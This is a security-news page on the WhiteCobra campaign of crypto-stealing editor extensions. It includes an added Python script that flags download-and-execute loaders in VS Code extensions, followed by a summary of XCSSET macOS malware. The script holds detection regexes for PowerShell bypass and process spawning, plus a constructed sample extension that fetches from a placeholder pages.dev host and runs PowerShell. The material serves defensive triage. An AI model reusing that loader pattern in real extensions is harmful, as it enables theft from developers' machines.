WhiteCobra targets VSCode users with crypto-stealing extensions

1 unique source, 1 article

Summary

A threat actor named WhiteCobra has targeted users of Visual Studio Code (VSCode), Cursor, and Windsurf by uploading 24 malicious extensions to the Visual Studio marketplace and the Open VSX registry. The extensions are designed to steal cryptocurrency. The campaign is ongoing, with the threat actor continuously replacing removed extensions with new malicious ones. Core Ethereum developer Zak Cole reported that his wallet was drained after using a seemingly legitimate extension for the Cursor code editor. The extensions appear legitimate due to professionally designed icons, detailed descriptions, and inflated download counts. WhiteCobra previously conducted a $500,000 crypto-theft campaign in July using a fake extension for the Cursor editor.

Timeline

  1. 13.09.2025 17:00 1 article · 16d ago

    WhiteCobra uploads 24 malicious extensions to VSCode marketplaces

    WhiteCobra has uploaded 24 malicious extensions to the Visual Studio marketplace and the Open VSX registry, targeting users of VSCode, Cursor, and Windsurf. The extensions are designed to steal cryptocurrency and are continuously replaced as they are removed, keeping the campaign alive. Each extension executes a main file that defers to a secondary script, which downloads a platform-specific payload from Cloudflare Pages. On Windows, the payload runs LummaStealer malware via a PowerShell script. On macOS, a malicious Mach-O binary executes locally to load an as-yet-unidentified malware family.
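    The chain above (activation entry point, hand-off to a second local script, remote download, shell execution) is a shape a defender can triage for statically across installed extensions. The script below is an added example written for this page; it is not tooling from CyberHappenings, the cited reporting, or any marketplace vendor. It assumes only the VS Code extension layout (a package.json whose "main" points at the activation script), follows local require() calls from that script into secondary files, and scores co-occurring download-and-execute indicators. The regexes and the two sample extensions it writes into a temporary directory are constructed for illustration, not indicators taken from the campaign.

```python
"""Static triage of VS Code-style extensions for an activation-time
download-and-execute loader. Added example; heuristics are assumptions."""
import json
import re
import tempfile
from pathlib import Path

# Indicators a legitimate editor extension rarely combines at activation.
# Constructed heuristics, not campaign IoCs. Cloudflare Pages projects are
# served from *.pages.dev by default, hence that pattern.
PATTERNS = {
    "spawns_process": re.compile(r"child_process|execSync|spawn\(|exec\("),
    "powershell": re.compile(r"powershell|-EncodedCommand|-ExecutionPolicy\s+Bypass", re.I),
    "remote_fetch": re.compile(r"https?://[^\s'\"]+"),
    "dynamic_eval": re.compile(r"\beval\(|new Function\("),
    "pages_dev": re.compile(r"\.pages\.dev", re.I),
}
LOCAL_REQUIRE = re.compile(r"""require\(\s*['"](\.[^'"]+)['"]\s*\)""")


def collect_sources(entry: Path, max_depth: int = 3) -> dict[str, str]:
    """Read the entry script plus any local modules it requires, so a main
    file that merely defers to a secondary script is inspected with it."""
    seen: dict[str, str] = {}
    stack = [(entry, 0)]
    while stack:
        path, depth = stack.pop()
        candidates = [path, path.with_suffix(".js")] if path.suffix == "" else [path]
        for cand in candidates:
            if cand.is_file():
                path = cand
                break
        else:
            continue  # unresolvable require target; skip it
        key = str(path.resolve())
        if key in seen or depth > max_depth:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        seen[key] = text
        for rel in LOCAL_REQUIRE.findall(text):
            stack.append((path.parent / rel, depth + 1))
    return seen


def triage_extension(ext_dir: Path, threshold: int = 3) -> dict:
    """Score one extension directory; download + execute together weighs extra."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    main = manifest.get("main", "./extension.js")
    sources = collect_sources(ext_dir / main)
    findings: dict[str, list[str]] = {}
    for path, text in sources.items():
        for name, rx in PATTERNS.items():
            if rx.search(text):
                findings.setdefault(name, []).append(Path(path).name)
    score = len(findings)
    if "remote_fetch" in findings and "spawns_process" in findings:
        score += 2  # the stager shape: fetch something, then run it
    return {"name": manifest.get("name", ext_dir.name), "files": len(sources),
            "findings": findings, "score": score, "flagged": score >= threshold}


def write_sample_extensions(root: Path) -> tuple[Path, Path]:
    """Constructed fixtures: a benign extension and a loader-shaped one."""
    benign = root / "benign-formatter"
    (benign / "out").mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps(
        {"name": "benign-formatter", "main": "./out/extension.js"}))
    (benign / "out" / "extension.js").write_text(
        "const vscode = require('vscode');\n"
        "exports.activate = () => vscode.window.showInformationMessage('ready');\n")

    loader = root / "sample-loader-extension"
    loader.mkdir()
    (loader / "package.json").write_text(json.dumps(
        {"name": "sample-loader-extension", "main": "./extension.js"}))
    (loader / "extension.js").write_text(  # main defers to a secondary script
        "exports.activate = () => require('./prompt.js').run();\n")
    (loader / "prompt.js").write_text(  # constructed placeholder host, not a real indicator
        "const { execSync } = require('child_process');\n"
        "const https = require('https');\n"
        "const url = 'https://example-project.pages.dev/' + process.platform;\n"
        "exports.run = () => https.get(url, () => execSync('powershell -ExecutionPolicy Bypass -File stage.ps1'));\n")
    return benign, loader


def run_samples() -> dict[str, dict]:
    """Triage both constructed fixtures and return reports keyed by name."""
    with tempfile.TemporaryDirectory() as tmp:
        reports = [triage_extension(ext) for ext in write_sample_extensions(Path(tmp))]
    return {r["name"]: r for r in reports}


if __name__ == "__main__":
    for name, report in run_samples().items():
        status = "FLAG" if report["flagged"] else "ok  "
        print(f"{status} {name:<24} score={report['score']} findings={sorted(report['findings'])}")
```

    Point triage_extension at each directory under a real extensions folder (for VS Code, ~/.vscode/extensions) to rank installed extensions for manual review; a high score is a reason to read the code, not proof of compromise, since build tooling and terminal helpers legitimately spawn processes.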

Similar Happenings

XCSSET macOS Malware Targets Xcode Developers with Enhanced Features

A new variant of the XCSSET macOS malware has been detected, targeting Xcode developers with enhanced features. This variant includes improved browser targeting, clipboard hijacking, and persistence mechanisms. The malware spreads by infecting Xcode projects and steals cryptocurrency and browser data from infected devices. It uses run-only compiled AppleScripts for stealthy execution and employs sophisticated encryption and obfuscation techniques, and it incorporates new modules for data exfiltration, persistence, and clipboard monitoring. The malware has been observed in limited attacks, with Microsoft sharing findings with Apple and GitHub to mitigate the threat. Developers are advised to keep macOS and apps up to date and to inspect Xcode projects before building them.